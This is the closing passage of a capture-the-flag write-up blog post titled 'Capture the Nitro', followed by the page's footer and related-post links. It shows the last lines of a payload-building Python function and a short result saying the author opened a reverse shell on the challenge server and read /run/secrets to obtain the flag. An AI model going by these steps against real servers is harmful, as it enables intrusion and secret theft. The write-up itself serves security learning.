    <span class="n">payload</span> <span class="o">=</span> <span class="n">payload_prefix</span> <span class="o">+</span> <span class="n">payload_body</span> <span class="o">+</span> <span class="n">payload_suffix</span>
    <span class="k">return</span> <span class="n">payload</span>
</code></pre></div></div>

<h2 id="result">Result</h2>

<p>Reverse shell’d into the server, listed all the environment variables, found <code class="language-plaintext highlighter-rouge">/run/secrets</code>, got <code class="language-plaintext highlighter-rouge">ctn-fl4g</code>, sent the link over, captured the Nitro!</p>

<p><img src="/assets/images/posts/capture-the-nitro/reverse-shell.png" alt="" /></p>

<p><img src="/assets/images/posts/capture-the-nitro/nitro.png" alt="" /></p>

        
      </section>

      <footer class="page__meta">
        
        
  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      <a href="/tags/#en-us" class="page__taxonomy-item" rel="tag">en-us</a>
    
    </span>
  </p>




  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      <a href="/categories/#writeup" class="page__taxonomy-item" rel="tag">writeup</a>
    
    </span>
  </p>


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time datetime="2020-06-23T12:00:00+08:00">June 23, 2020</time></p>


      </footer>

      <section class="page__share">
  
    <h4 class="page__share-title">Share on</h4>
  

  <a href="https://twitter.com/intent/tweet?via=StillAzureH&text=Capture+the+Nitro+Writeup%20https%3A%2F%2Fstillu.cc%2Fwriteup%2F2020%2F06%2F23%2Fcapture-the-nitro%2F" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fstillu.cc%2Fwriteup%2F2020%2F06%2F23%2Fcapture-the-nitro%2F" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fstillu.cc%2Fwriteup%2F2020%2F06%2F23%2Fcapture-the-nitro%2F" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>
</section>


      
  <nav class="pagination">
    
      <a href="/writeup/2019/07/31/ais3-2019-ransomware-sample-analysis/" class="pagination--pager" title="AIS3 2019 Ransomware Sample Analysis
">Previous</a>
    
    
      <a href="/writeup/2020/06/28/ais3-preexam-zh-2020/" class="pagination--pager" title="AIS3 2020 Pre-exam Writeup (中文)
">Next</a>
    
  </nav>

    </div>

    
      <div class="page__comments">
  
  
      <h4 class="page__comments-title">Leave a comment</h4>
      <section id="utterances-comments"></section>
    
</div>

    
  </article>

  
  
    <div class="page__related">
      <h4 class="page__related-title">You may also enjoy</h4>
      <div class="grid__wrapper">
        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/ida-tips/2022/01/22/saved-desktops-across-32bit-64bit/" rel="permalink">IDA Trickeries #1: Using Saved Desktop Across IDAs
</a>
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2022-01-22T00:00:00+08:00">January 22, 2022</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          1 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">So like… who at Hex-rays implemented this?
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/threat-spotlight/2021/11/13/domain-fronting-fastly/" rel="permalink">Threat Spotlight - Domain Fronting
</a>
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-11-13T00:00:00+08:00">November 13, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          5 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">Fast(ly) but deadly.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/personal/2021/10/29/barinsta-and-facebook/" rel="permalink">Facebook, Monopoly, and Barinsta
</a>
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-29T00:00:00+08:00">October 29, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          8 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">Facebook and its anti-competitive strategy.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/personal/2021/07/12/lockdown-taiwan-2021/" rel="permalink">Lockdown, Taiwan, 2021
</a>
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-07-12T00:00:00+08:00">July 12, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          2 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">Impact of lockdown in Taiwan and my personal life.
</p>
  </article>
</div>

        
      </div>
    </div>
  
  
</div>

    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap"><form class="search-content__form" onkeydown="return event.key != 'Enter';">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term..." />
  </form>
  <div id="results" class="results"></div></div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    
      <li><strong>Follow:</strong></li>
    

    

    
      <li><a href="/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
    
  </ul>
</div>

<div class="page__footer-copyright">&copy; 2022 Still Hsu. Powered by <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/minimal-mistakes-jekyll-theme/" rel="nofollow">Minimal Mistakes</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>




  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-N6FGTZBMTZ"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-N6FGTZBMTZ', { 'anonymize_ip': false});
</script>






    <script>
  'use strict';

  (function() {
    var commentContainer = document.querySelector('#utterances-comments');

    if (!commentContainer) {
      return;
    }

    var script = document.createElement('script');
    script.setAttribute('src', 'https://utteranc.es/client.js');
    script.setAttribute('repo', 'Still34/landing');
    script.setAttribute('issue-term', 'pathname');
    script.setAttribute('theme', 'github-dark');
    script.setAttribute('crossorigin', 'anonymous');

    commentContainer.appendChild(script);
  })();
</script>

  





  </body>
</html>
